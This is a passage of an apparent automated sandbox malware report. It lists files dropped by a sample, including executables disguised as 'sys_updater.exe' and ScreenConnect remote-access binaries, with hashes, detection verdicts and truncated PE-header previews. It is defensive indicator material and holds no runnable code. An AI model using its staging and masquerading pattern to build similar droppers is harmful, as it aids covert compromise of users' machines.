                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sys_updater.exe.log

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):621
                                                                                                                                                                                          Entropy (8bit):5.361636180307982
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6KhayoDLI4MWuPCU6yVFO5iv:ML9E4KQwKDE4KGKZI6KhRAE4KKUNb
                                                                                                                                                                                          MD5:1046826584BB384FCAB6BD1EB6AB124E
                                                                                                                                                                                          SHA1:67659C715440EDB80D1EE39205E3340C535A4772
                                                                                                                                                                                          SHA-256:2127F53B2007583A189268CC06216B9FCB10A990879D3E47C5FFED8017176687
                                                                                                                                                                                          SHA-512:57600BAB3C3AB35EBA613F8D142B7388316C72D5AF573F6E41DFC844E6588A128DEDF538790F23C0DCEAC7991D8CB2376B291177A9A619291248E73B08AD24F2
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HM3SOlbpH71yEXUIEAOeIiGX.exe.log

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                          Entropy (8bit):4.0050635535766075
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1119
                                                                                                                                                                                          Entropy (8bit):5.345080863654519
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                                                                                                          MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                                                                                                          SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                                                                                                          SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                                                                                                          SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\RPHbzz3JqY.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):331776
                                                                                                                                                                                          Entropy (8bit):6.635102478988021
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:/DiElZeVJ9/+pPQHe5wocklXck9UBd4MvQhdaAadaH8CaTnlmIa+w4Iqr6KGus24:/DiETMgqkKBJm5+fnHYftcv7vQG6zIs
                                                                                                                                                                                          MD5:848ABDBD09C052799A0E0180B59F6FEE
                                                                                                                                                                                          SHA1:2F73B04BAF17C3A9F9D21F6F324D64306A10682C
                                                                                                                                                                                          SHA-256:1AA0622A744EC4D28A561BAC60EC5E907476587EFBADFDE546D2B145BE4B8109
                                                                                                                                                                                          SHA-512:EB3A87E787D151915DA06F89132D6E5B9B7682A3A69761795180050F42C7FBE8831049EE96410E7B7DE5E7C835CEFF1E24E84321CCCF8D6ED9BA5928BCA58203
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..|k.......k.......k..Rich.k..................PE..L......f.....................T....................@..........................P............@.................................................................. ...*..l...8...............................@............................................text...k........................... ..`.rdata..\...........................@..@.data...."..........................@....reloc...*... ...,..................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe:Zone.Identifier

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\RPHbzz3JqY.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\gtxkvh.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):710144
                                                                                                                                                                                          Entropy (8bit):7.502820216844358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
                                                                                                                                                                                          MD5:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
                                                                                                                                                                                          SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
                                                                                                                                                                                          SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................d....wc.....wc.....wc.....r...................F`.....Rich....................PE..L....].f.........."....'.D...................`....@.......................................@.................................\...h................................%.....T...................@.......(...@............`...............................text....C.......D.................. ..`.rdata..De...`...f...H..............@..@.data...d...........................@....reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\gtxkvh.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):710144
                                                                                                                                                                                          Entropy (8bit):7.502820216844358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
                                                                                                                                                                                          MD5:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
                                                                                                                                                                                          SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
                                                                                                                                                                                          SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................d....wc.....wc.....wc.....r...................F`.....Rich....................PE..L....].f.........."....'.D...................`....@.......................................@.................................\...h................................%.....T...................@.......(...@............`...............................text....C.......D.................. ..`.rdata..De...`...f...H..............@..@.data...d...........................@....reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\3TywDL8i\9iCHA8GK\9QRXpsuI\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\gtxkvh.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):710144
                                                                                                                                                                                          Entropy (8bit):7.502820216844358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
                                                                                                                                                                                          MD5:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
                                                                                                                                                                                          SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
                                                                                                                                                                                          SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................d....wc.....wc.....wc.....r...................F`.....Rich....................PE..L....].f.........."....'.D...................`....@.......................................@.................................\...h................................%.....T...................@.......(...@............`...............................text....C.......D.................. ..`.rdata..De...`...f...H..............@..@.data...d...........................@....reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\4pgKLvyS\3OrNf9Ry\jVB94owI\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):710144
                                                                                                                                                                                          Entropy (8bit):7.502820216844358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
                                                                                                                                                                                          MD5:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
                                                                                                                                                                                          SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
                                                                                                                                                                                          SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................d....wc.....wc.....wc.....r...................F`.....Rich....................PE..L....].f.........."....'.D...................`....@.......................................@.................................\...h................................%.....T...................@.......(...@............`...............................text....C.......D.................. ..`.rdata..De...`...f...H..............@..@.data...d...........................@....reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\7XRpz47Z\MWQSQZoG\LJi5CxaZ\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1180160
                                                                                                                                                                                          Entropy (8bit):7.703603560955088
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
                                                                                                                                                                                          MD5:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
                                                                                                                                                                                          SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
                                                                                                                                                                                          SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*..y..y..y..+y..yvZ.x..yvZ.x..yvZ.x..ys..x..y..y..y..y..yGY.x..yRich..y........PE..d....P.f.........."....'.....z......0..........@.............................@............`.................................................|...h................,...........0.......v..T....................x..(....t..@...............h............................text... ........................... ..`.rdata..X2.......4..................@..@.data...............................@....pdata...,..........................@..@_RDATA....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Cth3XJqK\Us7ocUFg\nChXmDXJ\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1180160
                                                                                                                                                                                          Entropy (8bit):7.703603560955088
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
                                                                                                                                                                                          MD5:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
                                                                                                                                                                                          SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
                                                                                                                                                                                          SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*..y..y..y..+y..yvZ.x..yvZ.x..yvZ.x..ys..x..y..y..y..y..yGY.x..yRich..y........PE..d....P.f.........."....'.....z......0..........@.............................@............`.................................................|...h................,...........0.......v..T....................x..(....t..@...............h............................text... ........................... ..`.rdata..X2.......4..................@..@.data...............................@....pdata...,..........................@..@_RDATA....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\EOcU1eIO\NvT1HrT7\PNkb0PCV\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1180160
                                                                                                                                                                                          Entropy (8bit):7.703603560955088
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
                                                                                                                                                                                          MD5:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
                                                                                                                                                                                          SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
                                                                                                                                                                                          SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*..y..y..y..+y..yvZ.x..yvZ.x..yvZ.x..ys..x..y..y..y..y..yGY.x..yRich..y........PE..d....P.f.........."....'.....z......0..........@.............................@............`.................................................|...h................,...........0.......v..T....................x..(....t..@...............h............................text... ........................... ..`.rdata..X2.......4..................@..@.data...............................@....pdata...,..........................@..@_RDATA....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\S11E1iMt\caXZVqEB\FssOp8yZ\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):710144
                                                                                                                                                                                          Entropy (8bit):7.502820216844358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
                                                                                                                                                                                          MD5:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
                                                                                                                                                                                          SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
                                                                                                                                                                                          SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
